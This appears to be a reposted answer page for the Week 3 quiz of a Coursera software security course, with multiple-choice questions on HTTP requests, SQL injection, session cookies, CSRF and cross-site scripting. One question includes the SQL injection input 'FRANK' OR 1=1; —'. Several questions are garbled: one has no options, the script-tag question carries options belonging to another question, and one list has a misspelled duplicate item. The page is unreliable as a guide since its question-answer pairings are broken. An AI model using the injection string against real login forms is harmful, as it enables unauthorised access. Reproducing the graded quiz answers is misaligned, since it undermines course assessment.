Software Security Week 3 Quiz Answer
Software Security Week 3 Quiz Answer
In this article i am gone to share Coursera Course Software Security Week 3 Quiz Answer with you..
Week 3 Quiz
What is one difference between an HTTP GET and an HTTP POST request?
- Only GET requests use the REFERER header
- Only GET requests are subject to the same-origin policy
- Only POST requests can encode parameters in the URL
- Only POST requests may include parameter data in the request body
Which of the following is true about static and dynamic web content?
- Static content may be re-generated with each request
- Static pages may include PHP programs, which execute at the browser
- The server often produces dynamic content based on the contents of the database
SQL injection exploits a bug in what interaction of a web application?
- Client to server
- Network to server
- Server to client
- Server to database
SQL injection often allows an attacker to do which of the following?
- Access information he shouldn’t
- Overrun a buffer to smash the stack
- Cause memory to be used after it’s freed
- All of the above
If you had to summarize the key (most specific) programming failure with SQL injection, it would be:
- Confusing data with code
- Bypassing authentication
- Trusting without verifying
- Circumventing the same origin policy
What is escaping an example of?
Suppose a web application implements authentication by constructing an SQL query from HTML from data using PHP’s prepared statements. What would happen if an attacker entered FRANK’ OR 1=1; — in the web form’s user field?
- The application will try to authenticate a user whose name is FRANK’ OR 1=1; —
- The text will modify the structure of the SQL query and possibly bypass authentication
- The text will be confused as the password and authentication will probably fail
- The text will corrupt the query structure and the database will view it as a syntax error
Why is it undesirable to implement session identifiers using (only) hidden form fields?
- Such fields cannot contain binary data
- These fields are easily modified by the user
- Such fields cannot include timeout information
- The session ID is forgotten when the browser window is closed
Suppose a browser submits a GET request to URL http://www.mybank.com/accountinfo on 20 February 2015. Which of the following cookies, if already stored at the browser, would be sent with the request?
- edition=us; expires=Wed, 18-Feb-2015; path=/; domain=.mybank.com
- sessid=ABCDEFG; expires=Sat, 21-Feb-2015; path=/; domain=.mybank.com
- lang=us-english; expires=Sat, 1-Aug-2015; path=/accountinfo/; domain=.fidelity.com
- editon=us; expires=Thu, 19-Feb-2015; path=/accountinfo/prefs; domain=.mybank.com
Which of the following are ways that session cookies could be stolen or forged?
- Stealing it from the password database
- Reading a cookie from an unencrypted web request
- Predicting the cookie’s structure and reconstructing it
- Copying them by keylogging
Which of the following are ways to reduce the impact of a stolen cookies?
- Associate the cookie with the client’s IP address
- Giving each cookie a timeout
- Changing a user’s cookie from session to session
- Prevent cookies from entering the DNS cache
- Stealing cookies frim from the password databas
- Associate the cookie with the server’s IP address
How can the REFERER field be used to defend against CSRF attacks?
- It ensures that requests only come from authenticated users
- It can’t be used reliably because it only works for dynamic content
- It can be used to ensure that sensitive requests are (only) initiated by interaction with a site’s own pages
<script></script>tags in HTML pages most often identify programs written in what language?
- Such programs could deny service by running forever
- Such programs may access browser-controlled resources, which include potentially sensitive data in HTML documents and cookies
- It doesn’t — these programs are only used to render dynamic content but are otherwise not security-relevant
XSS subverts what policy?
- Same Origin
- Secure defaults
What is the difference between stored (or persistent) XSS and reflected XSS?
- Stored XSS is amenable to blacklisting but reflected XSS is not
- Stored XSS works by injecting code in a site’s served content, while reflected XSS injects code in a URL
- Stored XSS works on database queries while reflected XSS works on cookies, which are received from and reflected back to the server